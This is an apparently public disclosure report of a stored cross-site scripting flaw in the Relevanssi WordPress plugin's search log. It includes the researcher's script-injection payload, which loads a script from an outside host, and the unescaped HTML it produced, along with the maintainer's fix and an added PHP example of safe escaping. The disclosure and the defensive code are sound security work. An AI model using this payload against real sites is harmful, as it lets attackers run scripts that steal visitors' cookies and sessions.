Cross-site Scripting (XSS) - Stored in msaari/relevanssi

Valid

Reported on

Oct 19th 2021


Description

Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for WordPress. It appears to us that the software is not properly filtering unsuccessful searches before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private bank. 👀

Proof of Concept

Our payload was sent via the website's search form and was formatted like so: foo"><script src=//xss></script><x=", which was displayed to the users of your plug-in like so:

<td>foo"&gt;<script src="//xss"></script><x=" <a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"><span class="dashicons dashicons-external"></span></x="></td>
<td style="padding: 3px 5px; text-align: center">2</td>

Impact

This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website. In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Geeknik Labs
2 months ago

Researcher


@admin, am curious if you can use https://wordpress.org/plugins/relevanssi/ when factoring the bounty? It shows 100,000+ active installs, despite the lack of stars on Github. Thank you!

We have contacted a member of the msaari/relevanssi team and are waiting to hear back 2 months ago
msaari
2 months ago

Maintainer


Thanks, I'll fix this. The WordPress.org plugin repo is the main distribution channel for the plugin, so yes, the update will appear there.

msaari
2 months ago

Maintainer


Line 339 in /lib/user-searches.php becomes

$query_link = wp_kses( $query->query, 'strip' );

The fix is now released as version 4.14.3. Relevanssi Premium isn't affected by this. Thanks!
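As an added illustration of the bug and the fix (this is not Relevanssi's code), the following stand-alone PHP renders one row of a search log the way the report shows it, first with the stored query concatenated raw into the markup and then with context-appropriate encoding; the render functions, the check helper and the sample row are hypothetical, and plain PHP escaping functions stand in for the WordPress helpers (esc_html(), esc_url(), wp_kses()) that the maintainer's fix uses.

```php
<?php
// Added example (not Relevanssi's code): rendering a logged search term in an
// admin table, first the unsafe way the report describes, then escaped.
// The render functions, the check helper and the sample row are constructed here.

declare(strict_types=1);

// Payload from the report, as it would be stored in the search log.
const SAMPLE_QUERY = 'foo"><script src=//xss></script><x="';
const SAMPLE_HITS  = 2;

// Unsafe: the stored query is concatenated straight into the markup, so the
// browser of whoever views the log (typically an administrator) runs the tag.
function render_row_unsafe(string $query, int $hits): string
{
    $href = 'https://website/?s=' . $query;
    return '<td>' . $query . ' <a href="' . $href . '">'
        . '<span class="dashicons dashicons-external"></span></a></td>'
        . '<td style="padding: 3px 5px; text-align: center">' . $hits . '</td>';
}

// Hardened: encode for the context the value lands in. The text node gets
// HTML entity encoding, the query-string value gets URL encoding, and the
// resulting URL is entity-encoded again because it sits inside an attribute.
// In WordPress the equivalents are esc_html(), esc_url() and wp_kses().
function render_row_safe(string $query, int $hits): string
{
    $flags = ENT_QUOTES | ENT_HTML5;
    $text  = htmlspecialchars($query, $flags, 'UTF-8');
    $href  = htmlspecialchars('https://website/?s=' . rawurlencode($query), $flags, 'UTF-8');
    return '<td>' . $text . ' <a href="' . $href . '">'
        . '<span class="dashicons dashicons-external"></span></a></td>'
        . '<td style="padding: 3px 5px; text-align: center">' . $hits . '</td>';
}

// Regression check usable in a unit test: does the rendered markup still
// carry a raw <script tag that originated in the stored value?
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

var_dump(contains_raw_script(render_row_unsafe(SAMPLE_QUERY, SAMPLE_HITS)));
var_dump(contains_raw_script(render_row_safe(SAMPLE_QUERY, SAMPLE_HITS)));
echo render_row_safe(SAMPLE_QUERY, SAMPLE_HITS), PHP_EOL;
```

Running it with `php` shows the unsafe row still carrying the injected tag while the escaped row renders the payload as visible text only.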

msaari validated this vulnerability 2 months ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
msaari confirmed that a fix has been merged on 4a8168 2 months ago
The fix bounty has been dropped
Geeknik Labs
2 months ago

Researcher


@msaari LGTM, thank you for the fast response!